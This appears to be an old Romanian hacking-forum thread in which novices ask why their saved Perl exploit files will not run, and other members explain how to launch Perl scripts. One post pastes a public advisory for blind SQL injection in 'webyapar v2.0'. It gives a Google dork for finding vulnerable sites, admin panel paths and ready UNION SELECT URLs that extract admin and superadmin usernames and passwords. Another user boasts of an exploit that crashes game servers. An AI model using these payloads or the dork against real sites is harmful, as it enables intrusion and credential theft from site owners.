|
cahdecah
Membru nou
Inregistrat: acum 17 ani
Postari: 1
|
|
instaleaza si perl-u inainte sa rulezi
sau foloseste linux
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
 Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
am aceasi problema .... in skimb am un exploit care merge ..dar cele salvate de mine .pl nu merg !!!  ..... am sa reinstalez luni windows si bag si linux`u ...offf
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
hackedss
Elite Member
 Inregistrat: acum 17 ani
Postari: 858
|
|
nu man tot asa o sa iti faca nu stiu ce naiba exista vreo explicatie de ce cele salvate de noi nu se deschid doar TXT ?
_______________________________________
|
|
| pus acum 17 ani |
|
|
DarkTempo
Elite Member
Inregistrat: acum 18 ani
Postari: 556
|
|
vedeti ca este un tutorial perl pe aici pe forum daca nu ma insel este si la noobs si la exploituri si pocs
toate ca toate dupa ce instalezi perl si salvezi scriptul ca sa il rulezi trebuie folosita comanda:
perl name.pl
pentru ca sistemul de operare nu are de unde sa stie ce fel de script este daca la inceput nu contine o linie de genul asta #!/usr/bin/perl care ii da identitate de perls script si de fapt da calea catre interpretor (adica in cazul asta perl) alt exemplu #!/usr/bin/sh care ne zice ca e shell script si da calea catre sh
ma rog nu stiu cat de bine m-am explicat aici si in ce masura v-am ajutat dar prindeti voi ideea DACA cititi un pic
_______________________________________
admin edit: poza mai mare de 300 x 100 pixeli
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
pai la noi ( cei de pe windows ) nu cred ca merge sa facem d`astea in notepad ..decat in c++  ....
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
 Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
cabron-echo-ebola a scris:
pai la noi ( cei de pe windows ) nu cred ca merge sa facem d`astea in notepad ..decat in c++ .... |
De ce ? Din moment ce exista perl pentru windows (ActivePerl), normal ca se pot face scripturi in perl pe windows. Singura conditie e sa fie rulat cum a spus DarkTempo mai sus, adica perl fisier.pl.
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
da mai OSHO asa am rulat .... are dreptate si DarkTempo ..... am un fisier .pl dar cel care vreau sa il salvez eu de ce nu merge ? ....... eu abia invat kestia asta cu perl ... suna f interesant si vreau sa il invat .... dar nu stiu ce are de nu pot eu salva .pl ......
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
asta este exploit`u :
#########################################################################################################################
#########################################################################################################################
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
#########################################################################################################################
#########################################################################################################################
##### TURKISH SECURİTY MAN AND C0D3R ####################### MAİL : ###########################
##### - ##### web : ##########
##### PERFECT C0D3R AND SECURİTY ## >>>>>>>>>>>>>> MESSAGE : HAYAT İLLEGAL <<<<<<<<<<<<<<< ##
#########################################################################################################################
# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability
# AUTHOR: : bypass
# script name : Webyapar v2.0 { 700$ }
# Language : Tr
# scritp web page :
# script bug : remote sql enjeksiyon
# script admin panel1 : http://victim/script_path/yonetim
# script admin panel2 : http://victim/script_path/yonetim2
# google dork : inurl:"?page=duyurular_detay&id="
#Message Tr : ingilizcem pek iyi degildir. kodun piyasada satıs degeri 700$ - kodun sql dısında xss acıklarıda bulunmaktadır
ama pek fazla xss acıkları işinize yaramayacaktır. yonetim panelleri standart verilmistir...
# Message Tr : Hayat İllegal - / -
< / -------------------------------------------------------------------------------------------------------- />
< / ------ Example sql bug 1 admin username : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
< / ------ Example sql bug 1 admin password : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
< / ------ Example sql bug 2 superadmin password and admin username : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
< / -------------------------------------------------------------------------------------------------------- />
Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
# milw0rm.com [2007-07-25]
iar dupa ce il execut asa arata :
48KB
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
nu stiu daca este bun exploitu` dar este luat dupa ..eu acum invat sa umblu` cu astea
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
aha ... pai si unde gasesc exploituri ......facute ..ca de facut inca ... inca... nu ma pricep ? se gasesc pe forum aici sau .... nu sunt prea multe ? .....
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
ok hai ca incerc sa vad ce reusesc ....daca nu ... arunc pc`u pe geam  sau ma arunc eu pe geam 
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
hackedss
Elite Member
Inregistrat: acum 17 ani
Postari: 858
|
|
ati reusit pana la urma ? sa faceti exploitu sa mearga ?
_______________________________________
|
|
| pus acum 17 ani |
|
cabron-echo-ebola
Grand Master
Din: root
Inregistrat: acum 17 ani
Postari: 305
|
|
aha ... m`am aruncat pe geam eu  ca pc`u e destept ..eu noob ! ... nu pot ... nu stiu .. nu merge ... am un exploit care pica servere de cs ...si ala merge !!! e facut bine ..dar eu ... nu stiu sa le fac ...sa mearga ..
Modificat de cabron-echo-ebola (acum 17 ani)
_______________________________________
Hacking is the way ...
|
|
| pus acum 17 ani |
|
hackedss
Elite Member
Inregistrat: acum 17 ani
Postari: 858
|
|
care ne poate ajuta pls tell me
_______________________________________
|
|
| pus acum 17 ani |
|
|
DarkTempo
Elite Member
Inregistrat: acum 18 ani
Postari: 556
|
|
cu ce anume sa va ajutam ?
cu "codul" de mai sus ? dupa cum zicea OSHO ala nu e cod, in schimb cu rulatul fisierelor in perl vi s-a explicat mai sus.
Nu stiu cu ce v-am mai putea ajuta, eentual cu chestii banale cum ar fi in notepad sa dati cand salvati pe optiunea "any file" de la file type
Numai ca am impresia ca voi vreti sa spargeti sau sa stricati anumite chestii fara a avea cea mai vaga idee despre ce se intampla sau ce vreti sa faceti ... sper sa ma insel
Cautati si voi informatii ca gasiti, sapati adanc si invatati ca nimeni nu s-a nascut expert si toti au trebuit sa sape la un moment dat
_______________________________________
admin edit: poza mai mare de 300 x 100 pixeli
|
|
| pus acum 17 ani |
|
